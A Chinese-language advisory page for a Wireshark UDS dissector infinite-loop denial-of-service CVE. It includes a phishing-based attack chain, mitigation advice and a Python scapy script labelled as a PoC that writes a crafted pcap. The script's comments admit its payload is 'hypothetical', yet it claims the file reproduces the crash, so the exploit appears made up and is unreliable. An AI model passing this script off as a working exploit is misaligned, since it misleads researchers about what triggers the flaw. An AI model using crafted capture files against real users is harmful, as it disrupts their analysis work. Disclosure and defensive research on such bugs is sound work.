CVE-2026-7375 CVSS 5.5 中危

CVE-2026-7375 Wireshark UDS协议无限循环漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7375

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark网络协议分析工具在4.6.0至4.6.4和4.4.0至4.4.14版本的UDS协议解析组件中存在严重缺陷。该漏洞源于解析逻辑错误导致无限循环。攻击者可诱导用户打开特制数据包文件，致使程序挂起或崩溃，进而利用此漏洞实施拒绝服务攻击，影响网络分析工作的正常进行。

技术细节

该漏洞根源在于Wireshark的UDS（统一诊断服务）协议解析器代码逻辑中缺乏对特定异常数据包的健壮性检查。当解析器遇到精心构造的畸形UDS数据流时，由于循环终止条件判断失效，程序会陷入死循环。攻击者利用社会工程学手段诱导受害者下载并打开包含恶意数据包的pcap或pcapng文件。由于Wireshark需要解析文件内容以显示协议详情，解析过程会触发无限循环，导致CPU占用率飙升至100%，应用程序界面失去响应，最终迫使进程终止。虽然攻击需要用户交互，但无需系统权限，极易在常规网络分析工作中被触发，严重影响了安全人员的排查效率。

攻击链分析

STEP 1

步骤1：制作恶意文件

攻击者构造包含特定畸形UDS协议数据包的pcap或pcapng文件，该数据包旨在触发解析器的无限循环逻辑。

STEP 2

步骤2：投递文件

攻击者通过网络钓鱼、邮件附件或文件共享平台，将恶意抓包文件发送给目标用户。

STEP 3

步骤3：用户交互

目标用户在未察觉风险的情况下，使用受影响版本的Wireshark打开该恶意文件进行网络分析。

STEP 4

步骤4：触发漏洞

Wireshark的UDS协议解析器在处理文件内容时，因逻辑错误陷入无限循环，大量消耗CPU资源。

STEP 5

步骤5：拒绝服务

Wireshark应用程序界面无响应（挂起）或崩溃，导致用户无法继续进行网络分析工作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-7375 (Wireshark UDS Dissector Infinite Loop DoS)
This script generates a pcap file with a malformed UDS packet structure.
Opening the generated file in vulnerable Wireshark versions triggers the infinite loop.
"""

from scapy.all import *
import sys

def generate_poc(filename):
    # Crafting a raw packet that simulates a UDS (ISO-TP on TCP) stream
    # Note: The specific byte sequence triggering the loop varies by vulnerability details.
    # This payload is structured to potentially confuse length checks in dissectors.
    
    # Hypothetical malformed UDS payload
    # 0x22 (ReadDataByIdentifier) followed by data that might confuse the parser loop
    malicious_payload = bytes.fromhex("22F1860102030405060708090A0B0C0D0E0F")
    
    # Encapsulate in Ethernet/IP/TCP to simulate a network capture
    # Using a common port for diagnostic traffic or raw TCP
    ether = Ether(dst="00:11:22:33:44:55", src="66:77:88:99:aa:bb")
    ip = IP(src="192.168.1.10", dst="192.168.1.20")
    tcp = TCP(sport=50000, dport=13400, flags="PA", seq=1000, ack=2000)
    
    # Assemble the packet
    pkt = ether / ip / tcp / Raw(load=malicious_payload)
    
    # Save to pcap
    wrpcap(filename, [pkt])
    print(f"[+] PoC file '{filename}' generated successfully.")
    print(f"[+] Open this file in Wireshark 4.6.0 - 4.6.4 to reproduce the DoS.")

if __name__ == "__main__":
    generate_poc("cve_2026_7375_poc.pcap")

影响范围

Wireshark 4.6.0 to 4.6.4

Wireshark 4.4.0 to 4.4.14

防御指南

临时缓解措施

建议用户立即将Wireshark升级至修复了该漏洞的最新版本。在未完成升级前，应严格禁止打开来源不明或不可信的抓包文件（.pcap, .pcapng）。安全研究人员在分析UDS协议相关流量时，应在隔离的虚拟机环境中进行，以防止主机资源耗尽导致工作中断。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表